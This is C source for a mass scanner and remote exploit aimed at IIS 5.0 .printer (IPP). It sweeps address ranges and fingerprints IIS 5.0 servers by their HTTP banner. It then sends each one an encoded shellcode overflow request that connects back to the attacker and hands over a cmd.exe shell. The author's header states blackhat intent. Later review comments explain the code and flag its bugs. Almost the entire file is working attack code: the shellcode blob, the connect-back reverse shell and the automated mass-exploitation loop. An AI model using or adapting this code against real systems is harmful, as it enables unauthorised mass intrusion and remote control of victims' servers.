IIS 5.0 / Windows 2000 mass scanner / rooter which spawns a shell from a vulnerable system back to the machine from which the attack is launched.
24f0ee8484f067e1f4b58579af1d7deca6ff9ef430a2ae999a08629bbc3e11c1
/*
mass IPP by rD of USG
fuck all you ./hack scriptkiddies
fuck all ./juno kids
greetz to my brother bobbyd1gital of FBH
ain't no one online like bobby to me!
ain't no one like Cc0d3r to me IRL
Inkubus stop posting advisories we are fucken blackhats not some brainwashed whitehats security industry slaves
shouts to v0id, NtWaK0, scut,c1sco, PHC and all the blackhats
the rap shit is eating my mind
rD of USG (UNIX Security Guards)
usg@africamail.com
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>
#include <unistd.h>
#include <arpa/inet.h>
#include <sys/errno.h>
#include <signal.h>
#include <fcntl.h>
#include <sys/time.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <netdb.h>
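/* errno comes from <errno.h>, included above. A separate
 * `extern int errno;` (which the original had here) is wrong on any libc
 * where errno is a macro expanding to a function call, so it is dropped. */

/* Address the payload connects back to; shell() listens on tcp/6660 on
 * this machine. It must be reachable from the target or no shell arrives. */
#define LOCAL_IP "192.168.0.1"
#define TIMEOUT 3                           /* seconds allowed for a connect() in try() */
#define SHELL_TIMEOUT 6                     /* seconds shell() waits for the connect-back */
#define BANNER "Microsoft-IIS/5.0"          /* Server: value that makes try() call jill() */
#define SEND "HEAD / HTTP/1.0\r\n\r\n\r\n"  /* banner-grab request sent by try() */

char server[500];   /* raw reply from the most recent try() probe */
char *result;       /* "Server:" header inside server[], or NULL if absent */

void usage(char *);
void try(char *);
int jill(char *, char *);

static int i, x, y, z;   /* getopt result and the three octet counters used by A/B/C */

/* Range walkers: A() covers a /8, B() a /16, C() a /24. Declared char but
 * the value is never used by their callers. */
char A(char *);
char B(char *);
char C(char *);
char D(char *);   /* declared only; no definition appears in this listing */

/* Option buffers sized for "xxx", "xxx.xxx", "xxx.xxx.xxx" plus NUL, and
 * the formatted probe address ("255.255.255.255" plus NUL). */
static char a[4], b[8], c[12], ip[17];

void shell(void);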
/* main */
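/* main: parse exactly one scan-mode option and dispatch it.
 *   -a xxx          walk a /8 via A()
 *   -b xxx.xxx      walk a /16 via B()
 *   -c xxx.xxx.xxx  walk a /24 via C()
 *   -d host         probe a single address via try()
 * The option argument is copied into the fixed a/b/c buffers with
 * snprintf, so over-long input is silently truncated there. Returns 0
 * once the selected scan finishes (the walkers return only after
 * exhausting their range); exits -1 on a usage error. */
int main(int argc, char *argv[])
{
    fprintf(stdout, "\n\n\t\t mass IPP for IIS/5.0 by rD\n\n");
    if (argc != 3) {
        usage(argv[0]);
        exit(-1);
    }
    /* 'h' is in the option string so the help case is actually reachable
     * (the original handled it in the switch but never asked getopt for
     * it); the leading ':' makes a missing argument come back as ':'. */
    while ((i = getopt(argc, argv, ":ha:b:c:d:")) != -1) {
        switch (i) {
        case 'h':
            usage(argv[0]);   /* program name, not the option text */
            return 0;
        case 'a':
            snprintf(a, sizeof(a), "%s", optarg);
            A(a);
            break;
        case 'b':
            snprintf(b, sizeof(b), "%s", optarg);
            B(b);
            break;
        case 'c':
            snprintf(c, sizeof(c), "%s", optarg);
            C(c);
            break;
        case 'd':
            try(optarg);
            break;
        case ':':   /* option given without its argument */
        case '?':   /* unrecognised option */
        default:
            usage(argv[0]);
            exit(-1);
        }
    }
    return 0;
}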
/* end of main */
/* A */
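/* A: walk every host in a /8 — Aclass "x" becomes x.0.0.0 .. x.255.255.255 —
 * probing each with try(). Aclass must be one to three characters so the
 * formatted address fits ip[17]; an empty or longer prefix is rejected
 * with exit(-1) (the original accepted "" and probed ".0.0.0" onwards).
 * Always returns 0; the return type only matches the prototype and no
 * caller uses the value. */
char A(char *Aclass)
{
    size_t len = strlen(Aclass);

    if (len == 0 || len > 3) {
        printf("wrong range");
        exit(-1);
    }
    for (x = 0; x <= 255; ++x) {
        for (y = 0; y <= 255; ++y) {
            for (z = 0; z <= 255; ++z) {
                snprintf(ip, sizeof(ip), "%s.%d.%d.%d", Aclass, x, y, z);
                printf("trying %s\t->\t", ip);
                try(ip);
            }
        }
    }
    return 0;
}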
/* end of A */
/* B */
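/* B: walk every host in a /16 — Bclass "x.y" becomes x.y.0.0 .. x.y.255.255 —
 * probing each with try(). Bclass is limited to seven characters
 * ("xxx.xxx"), the most the caller's b[8] buffer can hold, so the
 * formatted address always fits ip[17]; empty or longer input is rejected
 * the same way A() rejects it. Always returns 0; the value is unused. */
char B(char *Bclass)
{
    size_t len = strlen(Bclass);

    if (len == 0 || len > 7) {
        printf("wrong range");
        exit(-1);
    }
    for (y = 0; y <= 255; ++y) {
        for (z = 0; z <= 255; ++z) {
            snprintf(ip, sizeof(ip), "%s.%d.%d", Bclass, y, z);
            printf("trying %s\t->\t", ip);
            try(ip);
        }
    }
    return 0;
}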
/* end of B */
/* C */
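/* C: walk every host in a /24 — Cclass "x.y.z" becomes x.y.z.0 .. x.y.z.255 —
 * probing each with try(). Cclass is limited to eleven characters
 * ("xxx.xxx.xxx"), the most the caller's c[12] buffer can hold.
 *
 * The original only noticed an empty prefix indirectly: before each probe
 * it compared the *previous* address in the global ip[] with ".4", which
 * can only match when Cclass is "", and exited after .0 through .4 had
 * already been tried. The explicit length check below rejects that case
 * up front, so the comparison is gone. Always returns 0; the value is
 * unused. */
char C(char *Cclass)
{
    size_t len = strlen(Cclass);

    if (len == 0 || len > 11) {
        printf("wrong range");
        exit(-1);
    }
    for (z = 0; z <= 255; ++z) {
        snprintf(ip, sizeof(ip), "%s.%d", Cclass, z);
        printf("trying %s\t->\t", ip);
        try(ip);
    }
    return 0;
}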
/* end of C */
/* try */
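/* try: banner-grab IP (dotted quad) on tcp/80 and, if the Server: header
 * contains BANNER, hand the host to jill(IP, LOCAL_IP).
 *
 * The connect is non-blocking and bounded by TIMEOUT seconds; the reply
 * is read once into the global server[] and result is left pointing at
 * the "Server:" header inside it (NULL when absent). Progress goes to
 * stdout, errors to stderr via perror().
 *
 * Fixes over the original: the socket is no longer close()d before it is
 * created (that closed whatever descriptor the uninitialised int named),
 * every early return closes the socket (a long scan leaked one fd per
 * failed host), errno is consulted only when connect() actually failed,
 * the terminator is written inside server[] rather than one past it, and
 * a reply with no newline after "Server:" no longer dereferences NULL. */
void try(char *IP)
{
    int sock, rc, ready, numbytes, soerr;
    socklen_t optlen;
    struct sockaddr_in remote;
    fd_set wset;
    struct timeval tv;
    char *eol;

    fflush(stdout);

    sock = socket(AF_INET, SOCK_STREAM, 0);
    if (sock == -1) {
        perror("socket creation error");
        return;
    }

    memset(&remote, 0, sizeof(remote));
    remote.sin_family = AF_INET;
    remote.sin_port = htons(80);
    remote.sin_addr.s_addr = inet_addr(IP);
    if (remote.sin_addr.s_addr == INADDR_NONE) {
        /* inet_addr() has no other way to report a malformed address
         * (the value also means 255.255.255.255, never a useful probe). */
        printf("bad address\n");
        close(sock);
        return;
    }

    /* Non-blocking so a silent host costs at most TIMEOUT seconds. */
    if (fcntl(sock, F_SETFL, O_NONBLOCK) == -1) {
        perror("fcntl error");
        close(sock);
        return;
    }
    rc = connect(sock, (struct sockaddr *)&remote, sizeof(remote));
    /* A non-blocking connect normally returns -1/EINPROGRESS and finishes
     * later; only a real failure is an error here. errno is meaningless
     * when rc == 0, which the original did not account for. */
    if (rc == -1 && errno != EINPROGRESS && errno != EISCONN) {
        perror("connection error");
        close(sock);
        return;
    }

    FD_ZERO(&wset);
    FD_SET(sock, &wset);
    tv.tv_sec = TIMEOUT;
    tv.tv_usec = 0;
    ready = select(sock + 1, NULL, &wset, NULL, &tv);
    if (ready == -1) {
        perror("select error");
        close(sock);
        return;
    }
    if (ready == 0) {
        printf("connection timed out..\n");
        close(sock);
        return;
    }
    /* Writable means the connect finished — possibly with an error such as
     * ECONNREFUSED, which only SO_ERROR reveals. */
    soerr = 0;
    optlen = sizeof(soerr);
    if (getsockopt(sock, SOL_SOCKET, SO_ERROR, &soerr, &optlen) == -1)
        soerr = errno;
    if (soerr != 0) {
        errno = soerr;
        perror("connection error");
        close(sock);
        return;
    }

    /* Back to blocking for the request/reply exchange, but cap the wait
     * for the reply so a host that accepts and never answers cannot stall
     * the whole scan. */
    if (fcntl(sock, F_SETFL, 0) == -1) {
        perror("fcntl error");
        close(sock);
        return;
    }
    tv.tv_sec = TIMEOUT;
    tv.tv_usec = 0;
    (void)setsockopt(sock, SOL_SOCKET, SO_RCVTIMEO, &tv, sizeof(tv));

    /* sizeof(SEND) counts the terminating NUL; send only the request text. */
    numbytes = send(sock, SEND, sizeof(SEND) - 1, 0);
    if (numbytes == -1) {
        perror("connection error");
        close(sock);
        return;
    }

    /* Leave room for the terminator: the original wrote server[500] when
     * the reply filled the buffer. */
    numbytes = recv(sock, server, sizeof(server) - 1, 0);
    if (numbytes == -1) {
        perror("recv");
        close(sock);
        return;
    }
    server[numbytes] = '\0';
    if (server[0] == '\0') {
        printf("connection closed\n");
        close(sock);
        return;
    }

    result = strstr(server, "Server:");
    if (result == NULL) {
        printf("no server string found\n");
        close(sock);
        return;
    }
    /* Cut the header at end of line; a reply truncated mid-header has no
     * newline, so tolerate a NULL from strchr(). */
    eol = strchr(result, '\n');
    if (eol != NULL)
        *eol = '\0';
    printf("%s\n", result);

    close(sock);   /* jill() opens its own connection */
    if (strstr(result, BANNER) != NULL) {
        printf("exploiting ...\n");
        jill(IP, LOCAL_IP);
    }
}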
/* end of try */
/* jill */
/* jill: send the oversized .printer request to `victim` on tcp/80 with
 * the connect-back port and address patched into the payload, then call
 * shell() to wait for the incoming connection.
 *
 * victim   - hostname or dotted-quad of the IIS host (try() passes the
 *            address it just banner-grabbed)
 * attacker - hostname or address the payload should connect back to;
 *            try() passes LOCAL_IP
 * Returns: declared int, but every path is a bare `return;` and try()
 * ignores the value.
 *
 * NOTE(review): if gethostbyname(victim) fails, hstrerror()'s result is
 * discarded (it has no other effect) and the NULL ht is dereferenced a
 * few lines later. */
int jill(char *victim, char *attacker)
{
#define aport 6660 /* must match the port shell() listens on */
/* The request as raw bytes. Decoding the printable parts: it opens with
 * "GET /NULL.printer HTTP/1.0\r\nBeavuh: ", continues with 0x90 filler
 * and the encoded payload, then "\r\nHost: " (0d 0a 48 6f 73 74 3a 20),
 * a long 0x90 run, a short trailer and the closing "\r\n\r\n". Near the
 * start of the payload there appears to be a `xor byte [eax],0x95` loop
 * (80 30 95 / 40 / e2 fa), which is presumably why the port and address
 * below are XORed with 0x95 per byte before being patched in. */
unsigned char sploit[]=
"\x47\x45\x54\x20\x2f\x4e\x55\x4c\x4c\x2e\x70\x72\x69\x6e\x74\x65\x72\x20"
"\x48\x54\x54\x50\x2f\x31\x2e\x30\x0d\x0a\x42\x65\x61\x76\x75\x68\x3a\x20"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\xeb\x03\x5d\xeb\x05\xe8\xf8\xff\xff\xff\x83\xc5\x15\x90\x90\x90"
"\x8b\xc5\x33\xc9\x66\xb9\xd7\x02\x50\x80\x30\x95\x40\xe2\xfa\x2d\x95\x95"
"\x64\xe2\x14\xad\xd8\xcf\x05\x95\xe1\x96\xdd\x7e\x60\x7d\x95\x95\x95\x95"
"\xc8\x1e\x40\x14\x7f\x9a\x6b\x6a\x6a\x1e\x4d\x1e\xe6\xa9\x96\x66\x1e\xe3"
"\xed\x96\x66\x1e\xeb\xb5\x96\x6e\x1e\xdb\x81\xa6\x78\xc3\xc2\xc4\x1e\xaa"
"\x96\x6e\x1e\x67\x2c\x9b\x95\x95\x95\x66\x33\xe1\x9d\xcc\xca\x16\x52\x91"
"\xd0\x77\x72\xcc\xca\xcb\x1e\x58\x1e\xd3\xb1\x96\x56\x44\x74\x96\x54\xa6"
"\x5c\xf3\x1e\x9d\x1e\xd3\x89\x96\x56\x54\x74\x97\x96\x54\x1e\x95\x96\x56"
"\x1e\x67\x1e\x6b\x1e\x45\x2c\x9e\x95\x95\x95\x7d\xe1\x94\x95\x95\xa6\x55"
"\x39\x10\x55\xe0\x6c\xc7\xc3\x6a\xc2\x41\xcf\x1e\x4d\x2c\x93\x95\x95\x95"
"\x7d\xce\x94\x95\x95\x52\xd2\xf1\x99\x95\x95\x95\x52\xd2\xfd\x95\x95\x95"
"\x95\x52\xd2\xf9\x94\x95\x95\x95\xff\x95\x18\xd2\xf1\xc5\x18\xd2\x85\xc5"
"\x18\xd2\x81\xc5\x6a\xc2\x55\xff\x95\x18\xd2\xf1\xc5\x18\xd2\x8d\xc5\x18"
"\xd2\x89\xc5\x6a\xc2\x55\x52\xd2\xb5\xd1\x95\x95\x95\x18\xd2\xb5\xc5\x6a"
"\xc2\x51\x1e\xd2\x85\x1c\xd2\xc9\x1c\xd2\xf5\x1e\xd2\x89\x1c\xd2\xcd\x14"
"\xda\xd9\x94\x94\x95\x95\xf3\x52\xd2\xc5\x95\x95\x18\xd2\xe5\xc5\x18\xd2"
"\xb5\xc5\xa6\x55\xc5\xc5\xc5\xff\x94\xc5\xc5\x7d\x95\x95\x95\x95\xc8\x14"
"\x78\xd5\x6b\x6a\x6a\xc0\xc5\x6a\xc2\x5d\x6a\xe2\x85\x6a\xc2\x71\x6a\xe2"
"\x89\x6a\xc2\x71\xfd\x95\x91\x95\x95\xff\xd5\x6a\xc2\x45\x1e\x7d\xc5\xfd"
"\x94\x94\x95\x95\x6a\xc2\x7d\x10\x55\x9a\x10\x3f\x95\x95\x95\xa6\x55\xc5"
"\xd5\xc5\xd5\xc5\x6a\xc2\x79\x16\x6d\x6a\x9a\x11\x02\x95\x95\x95\x1e\x4d"
"\xf3\x52\x92\x97\x95\xf3\x52\xd2\x97\x8e\xac\x52\xd2\x91\x5e\x38\x4c\xb3"
"\xff\x85\x18\x92\xc5\xc6\x6a\xc2\x61\xff\xa7\x6a\xc2\x49\xa6\x5c\xc4\xc3"
"\xc4\xc4\xc4\x6a\xe2\x81\x6a\xc2\x59\x10\x55\xe1\xf5\x05\x05\x05\x05\x15"
"\xab\x95\xe1\xba\x05\x05\x05\x05\xff\x95\xc3\xfd\x95\x91\x95\x95\xc0\x6a"
"\xe2\x81\x6a\xc2\x4d\x10\x55\xe1\xd5\x05\x05\x05\x05\xff\x95\x6a\xa3\xc0"
"\xc6\x6a\xc2\x6d\x16\x6d\x6a\xe1\xbb\x05\x05\x05\x05\x7e\x27\xff\x95\xfd"
"\x95\x91\x95\x95\xc0\xc6\x6a\xc2\x69\x10\x55\xe9\x8d\x05\x05\x05\x05\xe1"
"\x09\xff\x95\xc3\xc5\xc0\x6a\xe2\x8d\x6a\xc2\x41\xff\xa7\x6a\xc2\x49\x7e"
"\x1f\xc6\x6a\xc2\x65\xff\x95\x6a\xc2\x75\xa6\x55\x39\x10\x55\xe0\x6c\xc4"
"\xc7\xc3\xc6\x6a\x47\xcf\xcc\x3e\x77\x7b\x56\xd2\xf0\xe1\xc5\xe7\xfa\xf6"
"\xd4\xf1\xf1\xe7\xf0\xe6\xe6\x95\xd9\xfa\xf4\xf1\xd9\xfc\xf7\xe7\xf4\xe7"
"\xec\xd4\x95\xd6\xe7\xf0\xf4\xe1\xf0\xc5\xfc\xe5\xf0\x95\xd2\xf0\xe1\xc6"
"\xe1\xf4\xe7\xe1\xe0\xe5\xdc\xfb\xf3\xfa\xd4\x95\xd6\xe7\xf0\xf4\xe1\xf0"
"\xc5\xe7\xfa\xf6\xf0\xe6\xe6\xd4\x95\xc5\xf0\xf0\xfe\xdb\xf4\xf8\xf0\xf1"
"\xc5\xfc\xe5\xf0\x95\xd2\xf9\xfa\xf7\xf4\xf9\xd4\xf9\xf9\xfa\xf6\x95\xc2"
"\xe7\xfc\xe1\xf0\xd3\xfc\xf9\xf0\x95\xc7\xf0\xf4\xf1\xd3\xfc\xf9\xf0\x95"
"\xc6\xf9\xf0\xf0\xe5\x95\xd0\xed\xfc\xe1\xc5\xe7\xfa\xf6\xf0\xe6\xe6\x95"
"\xd6\xf9\xfa\xe6\xf0\xdd\xf4\xfb\xf1\xf9\xf0\x95\xc2\xc6\xda\xd6\xde\xa6"
"\xa7\x95\xc2\xc6\xd4\xc6\xe1\xf4\xe7\xe1\xe0\xe5\x95\xe6\xfa\xf6\xfe\xf0"
"\xe1\x95\xf6\xf9\xfa\xe6\xf0\xe6\xfa\xf6\xfe\xf0\xe1\x95\xf6\xfa\xfb\xfb"
"\xf0\xf6\xe1\x95\xe6\xf0\xfb\xf1\x95\xe7\xf0\xf6\xe3\x95\xf6\xf8\xf1\xbb"
"\xf0\xed\xf0\x95\x0d\x0a\x48\x6f\x73\x74\x3a\x20\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x33"
"\xc0\xb0\x90\x03\xd8\x8b\x03\x8b\x40\x60\x33\xdb\xb3\x24\x03\xc3\xff\xe0"
"\xeb\xb9\x90\x90\x05\x31\x8c\x6a\x0d\x0a\x0d\x0a";
int s;
unsigned short int a_port;
unsigned long a_host;
struct hostent *ht;
struct sockaddr_in sin;
if ((ht = gethostbyname(victim)) == NULL){
hstrerror(h_errno); /* NOTE(review): return value discarded; ht stays NULL */
}
sin.sin_port = htons(80);
/* Port in network byte order, masked with the payload's XOR key; the two
 * bytes are stored low byte first at sploit[441..442] below. */
a_port = htons(aport);
a_port^=0x9595;
sin.sin_family = AF_INET;
sin.sin_addr = *((struct in_addr *)ht->h_addr); /* NULL deref if victim lookup failed */
if ((ht = gethostbyname(attacker)) == 0){
herror(attacker);
return;
}
/* NOTE(review): h_addr is 4 bytes; on LP64 `unsigned long` reads 8 and
 * the cast is an aliasing violation — memcpy into a 32-bit value is the
 * portable form. Only the low 32 bits are used below. */
a_host = *((unsigned long *)ht->h_addr);
a_host^=0x95959595;
/* Fixed offsets into sploit[] where the payload expects the masked port
 * (2 bytes) and address (4 bytes). Tied to this exact byte string; not
 * verifiable from the listing — TODO confirm before touching sploit[]. */
sploit[441]= (a_port) & 0xff;
sploit[442]= (a_port >> 8) & 0xff;
sploit[446]= (a_host) & 0xff;
sploit[447]= (a_host >> 8) & 0xff;
sploit[448]= (a_host >> 16) & 0xff;
sploit[449]= (a_host >> 24) & 0xff;
if ((s = socket(AF_INET, SOCK_STREAM, 0)) == -1){
perror("socket");
return;
}
printf("\nconnecting to %s\n",victim);
/* NOTE(review): sin.sin_zero is never initialised; harmless in practice
 * but the struct should be memset first. */
if ((connect(s, (struct sockaddr *) &sin, sizeof(sin))) == -1){
perror("connect");
return;
}
/* NOTE(review): strlen() stops at the first NUL, so if any patched byte
 * XORs to 0x00 (an address octet or port byte equal to 0x95) the request
 * is truncated; sizeof(sploit) - 1 is the intended length. write()'s
 * return value is unchecked, and the socket leaks on the error paths. */
write(s, sploit, strlen(sploit));
sleep (1);
close (s);
printf("shellcode excuted, waiting for shell...\n");
/* NOTE(review): the listener on tcp/6660 is opened only now — after the
 * request was sent and a second has elapsed — so a connect-back that
 * arrives before shell() has called bind()/listen() is refused. */
shell();
return;
}
/* end of jill */
/* usage */
/* usage: print the accepted command lines to stderr. prog is substituted
 * into the first line (callers pass argv[0] or, in one place, argv[1]). */
void usage(char *prog)
{
    static const char *const forms[] = {
        " <-b> xxx.xxx\n",
        " <-c> xxx.xxx.xxx\n",
        " <-d> <hostname>\n",
    };
    size_t k;

    fprintf(stderr, "usage %s <-a> xxx\n", prog);
    for (k = 0; k < sizeof(forms) / sizeof(forms[0]); k++)
        fputs(forms[k], stderr);
}
/* end of usage */
/* start of shell */
/* shell: wait for the connect-back that jill()'s payload is expected to
 * make to tcp/6660 on this host, then relay stdin to the peer (each
 * input line re-terminated with CRLF) and the peer's output to stdout.
 * Gives up after SHELL_TIMEOUT seconds if nothing arrives. The relay
 * loop has no exit condition; it only leaves on a send/recv/select
 * error.
 *
 * NOTE(review): the accept path is unlikely to work as written. accept()
 * is called on the non-blocking listener *before* select(), so it
 * normally returns -1/EAGAIN; select() is then passed rsmaster, which is
 * still empty (recvsock was added to wset, which nothing uses), so it
 * merely sleeps SHELL_TIMEOUT and returns 0, printing "damn it's
 * patched!". The intended sequence is select() on recvsock in a read
 * set, then accept(). */
void shell()
{
int recvsock , newsock , numbytes , size , opt; /* size should be socklen_t for accept() */
char recvbuffer[2048];
fd_set rs , rsmaster , wset; /* wset is populated below but never passed to select() */
struct sockaddr_in local,incomming;
struct timeval tv;
size = sizeof( struct sockaddr );
recvsock = socket(AF_INET , SOCK_STREAM , 0 );
if( recvsock == -1 )
{
perror("socket creation error");
return;
}
/* Listen on every interface, port 6660 — the value jill() patches into
 * the payload (aport). */
local.sin_addr.s_addr = INADDR_ANY;
local.sin_port = htons(6660);
local.sin_family = AF_INET;
memset( local.sin_zero , 0 , sizeof(local.sin_zero) );
if( ( bind(recvsock , (struct sockaddr *)&local , sizeof(struct sockaddr) )
) == -1 )
{
perror("bind error");
return;
}
if( listen(recvsock , 10 ) == -1 )
{
perror("listen error");
return;
}
FD_ZERO( &rsmaster );
FD_ZERO( &wset );
FD_SET( recvsock , &wset ); /* NOTE(review): should be rsmaster — see header comment */
tv.tv_sec = SHELL_TIMEOUT;
tv.tv_usec = 0;
if( fcntl( recvsock , F_SETFL , O_NONBLOCK ) == -1 )
{
perror("fcntl error");
return;
}
/* NOTE(review): non-blocking accept() before anything can have arrived;
 * its -1 result is only examined after the select() below. */
newsock = accept( recvsock , (struct sockaddr *)&incomming , &size);
opt = select( recvsock+1 , &rsmaster , NULL , NULL , &tv ); /* rsmaster is empty here */
if( opt == -1 )
{
perror("select error");
return;
}
if( !opt )
{
/* Timed out. "patched" is an inference: a firewall, a wrong LOCAL_IP
 * or the ordering problem above produce the same message. */
printf("damn it's patched!\n");
close(newsock);
close(recvsock);
return;
}
if( fcntl( recvsock , F_SETFL , 0 ) == -1 )
{
perror("fcntl error");
return;
}
/* NOTE(review): incomming is printed before newsock is validated, so
 * after a failed accept() this shows uninitialised data. */
printf("Incomming connection from %s\n",inet_ntoa(incomming.sin_addr));
printf("Spawning cmd.exe\n\n");
if( newsock == -1 )
{
perror("accept error");
return;
}
/* Relay loop: stdin (fd 0) -> peer, peer -> stdout.
 * NOTE(review): rs is copied from rsmaster *before* the descriptors are
 * added to it, so on the first pass select() waits on an empty set with
 * no timeout. */
while(1)
{
rs = rsmaster;
FD_SET( newsock , &rsmaster );
FD_SET( 0 , &rsmaster );
opt = select( newsock + 1 , &rs , NULL , NULL , NULL );
if( opt == -1 )
{
perror("select error");
return;
}
if( FD_ISSET( 0 , &rs ) )
{
/* NOTE(review): fgets() return is unchecked (EOF resends the stale
 * buffer), and snprintf() with recvbuffer as both destination and
 * source argument is undefined behaviour (overlapping objects). */
fgets(recvbuffer,sizeof(recvbuffer)-1,stdin);
snprintf(recvbuffer,sizeof(recvbuffer),"%s\r\n",recvbuffer);
numbytes = send(newsock , recvbuffer , strlen(recvbuffer) , 0);
if( numbytes == -1 )
{
perror("send error");
return;
}
}
else if( FD_ISSET( newsock , &rs ) )
{
numbytes = recv( newsock , recvbuffer , sizeof(recvbuffer) - 1 , 0 );
if( numbytes == -1 )
{
perror("recv error");
return;
}
/* Replace the assumed trailing CRLF with "\n\0" for printing.
 * NOTE(review): numbytes of 0 (peer closed) or 1 indexes before the
 * buffer, and a closed peer makes recv() return 0 on every pass, so
 * the loop never ends. */
recvbuffer[numbytes-2] = '\n';
recvbuffer[numbytes-1] = 0x0;
printf("%s",recvbuffer);
}
}
}
/* end of shell */
/* EOF */